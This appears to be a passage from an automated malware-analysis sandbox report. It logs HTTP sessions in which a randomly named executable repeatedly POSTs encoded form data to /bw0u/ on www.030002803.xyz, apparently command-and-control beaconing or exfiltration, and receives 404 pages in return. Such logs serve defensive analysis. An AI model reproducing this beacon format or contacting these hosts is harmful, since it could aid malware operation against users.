                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 [TRUNCATED]
                                                                    Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
                                                                    Jan 11, 2025 06:32:49.940936089 CET224INData Raw: 27 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 7b 20 27 61 6e 6f 6e 79 6d 69 7a 65 49 70 27 3a 20 74 72 75 65 20 7d 29 3b 0a 20 20 20 20 2f 2f 20 45 6e 64 20 47 6f 6f 67 6c 65
                                                                    Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='col2'>
                                                                    Jan 11, 2025 06:32:49.940949917 CET906INData Raw: 20 3c 68 31 3e 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 42 75 74 20 69 66 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 69 6c 64 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73
                                                                    Data Ascii: <h1> PAGE NOT FOUND.</h1> <p>But if you're looking to build your own website, <br/>you've come to the right place.</p> <p class="buttons"> <a class='button dark-bg' href='https://www.strikingly.com/?utm_source=404&ut


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.849730161.97.142.144805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:55.164902925 CET778OUTPOST /bw0u/ HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.030002803.xyz
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.030002803.xyz/bw0u/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 64 76 6d 51 48 68 44 77 52 4a 35 54 72 57 67 51 62 74 2b 4d 64 57 66 46 6e 6f 61 50 74 79 31 54 4f 53 33 63 73 68 49 77 69 6a 36 69 48 6d 59 6c 6d 43 73 42 72 58 72 48 69 6e 6c 30 64 4c 34 33 56 47 67 4c 56 4d 72 66 69 37 78 39 4e 75 4d 35 4f 4a 5a 41 47 41 34 45 43 71 58 7a 49 4d 37 72 6c 6c 33 4e 38 46 66 55 55 6b 4d 39 2f 6f 45 54 43 52 6a 76 6b 54 7a 59 38 74 2f 74 6f 68 61 79 79 37 31 61 62 6e 4b 30 45 6e 77 48 6f 35 36 51 44 2f 52 71 4b 74 59 42 51 47 49 73 6d 6f 6a 39 72 34 4e 78 56 6b 4f 30 78 32 4b 4c 64 69 74 6c 77 59 6b 47 57 57 70 2b 68 39 62 32 65 4c 54 73 58 66 73 39 44 75 49 3d
                                                                    Data Ascii: 1ZqD=dvmQHhDwRJ5TrWgQbt+MdWfFnoaPty1TOS3cshIwij6iHmYlmCsBrXrHinl0dL43VGgLVMrfi7x9NuM5OJZAGA4ECqXzIM7rll3N8FfUUkM9/oETCRjvkTzY8t/tohayy71abnK0EnwHo56QD/RqKtYBQGIsmoj9r4NxVkO0x2KLditlwYkGWWp+h9b2eLTsXfs9DuI=
                                                                    Jan 11, 2025 06:32:55.715848923 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:32:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: W/"66cce1df-b96"
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                    Jan 11, 2025 06:32:55.715867996 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.849731161.97.142.144805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:57.899036884 CET798OUTPOST /bw0u/ HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.030002803.xyz
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.030002803.xyz/bw0u/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 64 76 6d 51 48 68 44 77 52 4a 35 54 35 6e 51 51 58 73 2b 4d 59 32 66 4b 6f 49 61 50 34 43 31 58 4f 53 37 63 73 68 67 61 68 57 71 69 45 44 6b 6c 6e 48 41 42 34 6e 72 48 70 48 6c 78 51 72 35 61 56 47 39 38 56 49 72 66 69 34 4e 39 4e 73 55 35 4f 61 78 50 48 51 34 38 57 61 58 78 48 73 37 72 6c 6c 33 4e 38 46 62 75 55 6b 6b 39 2b 59 30 54 4e 55 44 75 75 7a 7a 58 37 74 2f 74 69 42 61 2b 79 37 31 38 62 6e 36 65 45 6b 45 48 6f 38 57 51 43 75 52 72 44 74 59 44 4e 32 4a 46 75 37 48 33 68 5a 52 77 63 6d 57 41 2f 46 33 77 63 55 41 50 71 36 73 41 56 57 42 56 68 2b 7a 41 62 38 4f 45 4e 38 38 4e 64 35 64 6e 7a 73 4e 56 72 50 58 2f 62 61 54 34 4a 72 71 39 77 48 41 54
                                                                    Data Ascii: 1ZqD=dvmQHhDwRJ5T5nQQXs+MY2fKoIaP4C1XOS7cshgahWqiEDklnHAB4nrHpHlxQr5aVG98VIrfi4N9NsU5OaxPHQ48WaXxHs7rll3N8FbuUkk9+Y0TNUDuuzzX7t/tiBa+y718bn6eEkEHo8WQCuRrDtYDN2JFu7H3hZRwcmWA/F3wcUAPq6sAVWBVh+zAb8OEN88Nd5dnzsNVrPX/baT4Jrq9wHAT
                                                                    Jan 11, 2025 06:32:58.426966906 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:32:58 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: W/"66cce1df-b96"
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                    Jan 11, 2025 06:32:58.426983118 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.849732161.97.142.144805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:00.443574905 CET1815OUTPOST /bw0u/ HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.030002803.xyz
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.030002803.xyz/bw0u/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 64 76 6d 51 48 68 44 77 52 4a 35 54 35 6e 51 51 58 73 2b 4d 59 32 66 4b 6f 49 61 50 34 43 31 58 4f 53 37 63 73 68 67 61 68 56 4b 69 45 78 38 6c 6d 6b 34 42 37 6e 72 48 33 33 6c 77 51 72 35 69 56 47 31 77 56 49 76 6c 69 39 4a 39 4e 4e 30 35 5a 37 78 50 4a 51 34 38 4a 4b 58 38 49 4d 36 76 6c 6c 6e 4a 38 46 4c 75 55 6b 6b 39 2b 61 73 54 45 68 6a 75 6f 7a 7a 59 38 74 2f 35 6f 68 61 53 79 37 39 43 62 6a 6d 6b 45 58 63 48 6f 63 47 51 50 38 35 72 4d 74 59 64 4f 32 4a 64 75 37 36 74 68 5a 4e 57 63 6e 6a 56 2f 46 50 77 65 44 45 58 34 4b 67 6a 41 6e 64 48 76 2b 48 42 61 73 65 56 45 4b 77 4c 42 34 78 36 6c 34 46 65 6d 4e 50 2f 57 72 4f 45 49 71 76 6d 30 41 77 54 75 73 7a 73 79 4a 4b 72 31 4b 43 73 36 31 78 45 52 4e 50 2b 6c 49 48 6a 55 67 76 61 46 42 63 64 44 36 70 69 61 61 56 55 4b 56 35 55 69 31 6d 76 4f 42 67 49 6c 49 48 31 6b 4b 7a 6d 59 77 32 7a 71 78 4c 2b 4d 58 36 2f 4d 35 64 77 4d 34 43 34 65 67 34 35 4e 36 63 43 53 45 68 65 6d 33 50 30 44 66 63 78 42 6b 79 49 6e 41 4b 2f 5a 4b 66 42 32 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=dvmQHhDwRJ5T5nQQXs+MY2fKoIaP4C1XOS7cshgahVKiEx8lmk4B7nrH33lwQr5iVG1wVIvli9J9NN05Z7xPJQ48JKX8IM6vllnJ8FLuUkk9+asTEhjuozzY8t/5ohaSy79CbjmkEXcHocGQP85rMtYdO2Jdu76thZNWcnjV/FPweDEX4KgjAndHv+HBaseVEKwLB4x6l4FemNP/WrOEIqvm0AwTuszsyJKr1KCs61xERNP+lIHjUgvaFBcdD6piaaVUKV5Ui1mvOBgIlIH1kKzmYw2zqxL+MX6/M5dwM4C4eg45N6cCSEhem3P0DfcxBkyInAK/ZKfB2UQwkQ8cz0/kPu0IZdXpwgMI/MihDGukIUqeBdsEOGQxCZViGR5dK8ix7fCKY029zQwjrNH8uAL+vWP/X6XMHw58oIxXOuofUkAP3p2ab+B8v74w9KS7kaGzKbwj99ZHlfqDQNyxv7EF9IYrY4sTZi1zwQDyigJyj/BmKzzmhj5fyafcCupSpmayU7BqCNRGI8VQ/S/SIXNAB6YcMUdCciTzJ3efjYvuASvzRCR7SO4jiA/FaGPY6Lxp5DVr9nt1Z73gCK+tXLYOoFUmgDpzQU0pi3l5w3Ach/UnDinte4Ow0xDj3jNehlV4v62OeTdiKCg+iMfPJaw2T1Ed89c+Tq3LbJsSdejJ+sFYZ7RZtGljdamudOP9oHoeiuSTCRMMgeKCfwg0Fe20sZdwXuLGRyiOaZzcP76EXaXGklU8+ElImTeMgWntFq8fLMRQbfRfhbmQHfKHkKhcHwZYW/cH5kyX6eDXmbfVnu8su4X6/1aANUcQbhD5CsMfGxBaLNxglmazTqyuqFuzksPAmmh69DCup6am//ocWJoQC09j9waJQNGUYzzGXUwIcUZrVAkNQf9aCOohl8algFSVOrW70UyktPGtXasjQBZtySjF2lMchzBg9FDvJiF89wvHFcQF92M6sbzbuQRV9G4clpe4j84XKFeZW5HWWab [TRUNCATED]
                                                                    Jan 11, 2025 06:33:01.068217993 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:33:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: W/"66cce1df-b96"
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                    Jan 11, 2025 06:33:01.068237066 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.849733161.97.142.144805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:02.987945080 CET515OUTGET /bw0u/?1ZqD=QtOwEWL3Wb8oglkkfuLXaSHSreWpjDtOOnahtC8c9UbbFmMC6Wp+vCjxsEk2BpxEB3gHT+/6vot9OJxtQqkBMHc9XtXTW/yd7EP1snPpVQUS9+gXOgGxj0LXj8PsnCHHkg==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:33:03.593358994 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:33:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 2966
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: "66cce1df-b96"
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                    Jan 11, 2025 06:33:03.593379021 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                    Jan 11, 2025 06:33:03.593389988 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                    Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
